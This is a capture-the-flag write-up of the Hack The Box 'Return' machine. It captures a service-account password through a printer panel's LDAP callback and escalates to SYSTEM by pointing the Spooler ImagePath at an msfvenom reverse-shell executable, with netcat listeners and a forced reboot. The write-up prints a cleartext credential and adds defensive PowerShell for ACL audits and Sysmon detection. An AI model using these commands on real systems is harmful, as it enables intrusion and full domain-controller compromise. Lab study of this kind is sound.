# Return

## Nmap

```
nmap 10.10.11.108 -p- -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-12 17:02:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
64370/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
```

{% hint style="info" %}
Add "10.10.11.108 return.local" to /etc/hosts.
{% endhint %}

I ran through the standard Active Directory checks, such as username and LDAP enumeration, but did not find anything of interest.

Checking port 80, we land on the root page, "HTB Printer Admin Panel".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbW1muzO2kn2l5pL9D2Ox%2Fimage.png?alt=media\&token=97700727-574e-43bf-aa4d-43e2a66d7130)

We also have a page of interest under `/settings.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FR1rdFJ015i8GVNbX6kiZ%2Fimage.png?alt=media\&token=66305ea7-fbc9-47ac-a7dc-ab775da04754)

Looking through the PHP source code, we are unable to identify anything of interest. Opening ZAP proxy and submitting the default settings through the "Update" button, we get the output below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FjRLY1av7xVFjK9cWqk9Q%2Fimage.png?alt=media\&token=a218cf72-c7a5-45a0-96f6-a0c7994fff44)

In the body of the POST request we can see the target system's hostname. From here I set a `nc` listener on my attacking system on the port specified in the `/settings.php` page.

```bash
# port 389 is privileged, hence sudo
sudo nc -lvp 389
```

Then I edited the POST request in ZAP Proxy to point back to my attacking system's IP.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxWzzvzexkdWa7TIuISrv%2Fimage.png?alt=media\&token=0d9d80b6-f78c-49bd-8317-3276602957f1)

After sending the request, the listener receives a password for the svc-printer account.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDJhMjNkO9Bs3piWaG6Mx%2Fimage.png?alt=media\&token=0f07fde1-6ddc-4e40-9661-94b832241812)

A quick test against `SMB` and `WinRM` with `crackmapexec` proves the credentials are valid.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLzMeueBPaiOvodTUonGp%2Fimage.png?alt=media\&token=bc5f1d29-d7f8-4b5c-bafd-cf749adfe1de)

From here we can use `Evil WinRM` to log in as the svc-printer user.

```
evil-winrm -u svc-printer -p '1edFg43012!!' -i 10.10.11.108
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F6TusqyxRWZJnijgJ5cMo%2Fimage.png?alt=media\&token=b8e4bf6f-1c01-4e5c-85e4-dc3008fecdae)

Now, with low-level access on the Domain Controller, we can look for a path to privilege escalation. A basic membership check with `whoami /groups` shows we are a member of the "Server Operators" group.

**Server Operators:** <https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fh9Me3PhroFFPCwy5u1Zv%2Fimage.png?alt=media\&token=f2be1773-c561-45af-96cb-ba3956556a37)

This group gives its members several interesting permissions, namely the ability to create, delete and reconfigure services.

The Medium article below gives a good outline of how to use this to escalate privileges.

**URL:** <https://medium.com/@parvezahmad90/windows-privilege-escalation-insecure-service-registry-to-system-shell-step-by-step-88776c712c17>

On this target we will do it with the Spooler service, though any service running in an elevated context would do.

First we double-check the currently configured binary path of the Spooler service.

```
reg query HKLM\system\currentcontrolset\services\Spooler /s /v imagepath
```

We can then check the ACL on the service's registry key. Below we see the owner is SYSTEM and the "Server Operators" group holds the "SetValue" right, which allows us to reconfigure the binary path.

```
get-acl HKLM:\system\currentcontrolset\services\Spooler | fl
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9QiEC6AQbrn7tqSWejbh%2Fimage.png?alt=media\&token=b91a54cc-71b7-41aa-b005-a09b4bcab250)
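The `get-acl` check above looks at one service. As an added audit script (not part of the original writeup), the PowerShell below generalises it to every key under `HKLM:\SYSTEM\CurrentControlSet\Services` and reports any identity outside an assumed baseline of administrative principals that holds a right capable of rewriting `ImagePath`; the baseline list and the function name are my own choices, and the script is meant to be run from an elevated session on the host being audited.

```powershell
# Audit script added to this writeup (not part of the original page). It lists
# every service registry key where a principal outside a small expected set of
# administrative identities holds a right that would allow rewriting ImagePath.
# Run from an elevated PowerShell session on the host being audited.

$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Identities expected to be able to change service configuration (assumed
# baseline; adjust to your environment). Anything else with write rights is reported.
$ExpectedWriters = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller',
    'CREATOR OWNER'
)

# Bits that let a principal change values or take over the key. FullControl
# contains all of them, so FullControl ACEs are caught as well. Read-only
# rights such as ReadKey share none of these bits and are ignored.
$WriteMask = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                   [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                   [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                   [System.Security.AccessControl.RegistryRights]::TakeOwnership)

function Get-WritableServiceKeys {
    foreach ($Key in Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue) {
        $Acl = Get-Acl -Path $Key.PSPath -ErrorAction SilentlyContinue
        if (-not $Acl) { continue }

        foreach ($Ace in $Acl.Access) {
            # Only Allow entries carrying at least one write-capable bit matter.
            if ($Ace.AccessControlType -ne 'Allow') { continue }
            if (([int]$Ace.RegistryRights -band $WriteMask) -eq 0) { continue }
            if ($ExpectedWriters -contains $Ace.IdentityReference.Value) { continue }

            [pscustomobject]@{
                Service   = $Key.PSChildName
                Identity  = $Ace.IdentityReference.Value
                Rights    = $Ace.RegistryRights
                Inherited = $Ace.IsInherited
                ImagePath = (Get-ItemProperty -Path $Key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

Get-WritableServiceKeys | Sort-Object Service, Identity | Format-Table -AutoSize
```

On a host configured like this box, the output would include a `BUILTIN\Server Operators` row for `Spooler` with `SetValue` in its rights. The `Inherited` column tells you whether the entry comes from the key itself or from the `Services` parent, which decides where the ACL needs to be tightened.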

On our attacking system we generate an x64 reverse shell executable.

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f exe -o reverse.exe
```

Then we transfer it over to the target system with `Evil WinRM`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F5v3ZPWFZzcJi0Eqmv1SN%2Fimage.png?alt=media\&token=10a466b8-2259-44fd-a3e9-fbd2f56dae37)

From here we can set the registry value that changes the binary path to the payload we just uploaded.

```
REG add HKLM\System\CurrentControlSet\Services\spooler /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\svc-printer\Documents\reverse.exe" /f
```

A `nc` listener is set on the attacking system.

```
sudo nc -lvp 443
```

Then a reboot is initiated on the target system. When the system comes back up, the Spooler service starts and executes the reverse shell binary.

```
shutdown.exe -r -f -t 10
```

This lands us a SYSTEM shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxLqo2E1S8n72LLOd6xmE%2Fimage.png?alt=media\&token=fc40bd24-0fc3-41fb-8798-19bb7f5b8085)
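The `REG add` step above leaves a clear trace: a registry value-set event on `...\Services\Spooler\ImagePath` whose new value points at a user-profile directory. As an added detection snippet (not part of the original writeup), the PowerShell below pulls Sysmon Event ID 13 (RegistryEvent, value set) records, keeps only writes to a service `ImagePath`, and flags any new executable that lives outside the Windows and Program Files directories. It assumes Sysmon is installed with a RegistryEvent rule covering the `Services` hive; the function names and the trusted-directory list are my own.

```powershell
# Detection snippet added to this writeup (not part of the original page). It
# assumes Sysmon is installed with a RegistryEvent (Event ID 13) rule that
# covers HKLM\SYSTEM\CurrentControlSet\Services, and reports ImagePath changes
# whose new executable lives outside the usual installation directories.

# Extract the executable from an ImagePath value such as
#   "C:\Program Files\App\svc.exe" -arg    or    C:\Windows\System32\spoolsv.exe
# by honouring quotes, dropping arguments and expanding %SystemRoot%-style variables.
function Get-ExecutableFromImagePath {
    param([string]$ImagePath)
    $Path = $ImagePath.Trim()
    if ($Path.StartsWith('"')) {
        $Exe = $Path.Substring(1).Split('"')[0]
    } else {
        $Exe = $Path.Split(' ')[0]
    }
    return [Environment]::ExpandEnvironmentVariables($Exe)
}

# Directories a legitimately installed service binary is expected to run from (assumed baseline).
$TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")

function Get-ServiceImagePathChanges {
    param([int]$Days = 7)

    $Filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 13                          # RegistryEvent (Value Set)
        StartTime = (Get-Date).AddDays(-$Days)
    }

    foreach ($Event in Get-WinEvent -FilterHashtable $Filter -ErrorAction SilentlyContinue) {
        # Sysmon stores its fields as <Data Name="..."> elements; flatten them into a hashtable.
        $Xml  = [xml]$Event.ToXml()
        $Data = @{}
        foreach ($Field in $Xml.Event.EventData.Data) { $Data[$Field.Name] = $Field.'#text' }

        # Only writes to a service's ImagePath value are of interest.
        if ($Data.TargetObject -match '\\Services\\([^\\]+)\\ImagePath$') {
            $Service = $Matches[1]
        } else {
            continue
        }

        $NewExe  = Get-ExecutableFromImagePath $Data.Details
        $Trusted = $false
        foreach ($Root in $TrustedRoots) {
            if ($NewExe.StartsWith($Root, [System.StringComparison]::OrdinalIgnoreCase)) { $Trusted = $true }
        }

        [pscustomobject]@{
            Time       = $Data.UtcTime
            Service    = $Service
            NewExe     = $NewExe
            WriterProc = $Data.Image      # process that set the value (reg.exe, sc.exe, services.exe ...)
            Suspicious = -not $Trusted    # new binary outside Windows / Program Files
        }
    }
}

Get-ServiceImagePathChanges -Days 7 | Sort-Object Time | Format-Table -AutoSize
```

For the change made in this writeup the row would show `Spooler`, a `NewExe` under `C:\Users\svc-printer\Documents\`, `reg.exe` as the writing process and `Suspicious = True`. Pairing this with the Server Operators audit above is the practical mitigation: the event tells you it happened, the ACL review tells you who could do it again.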

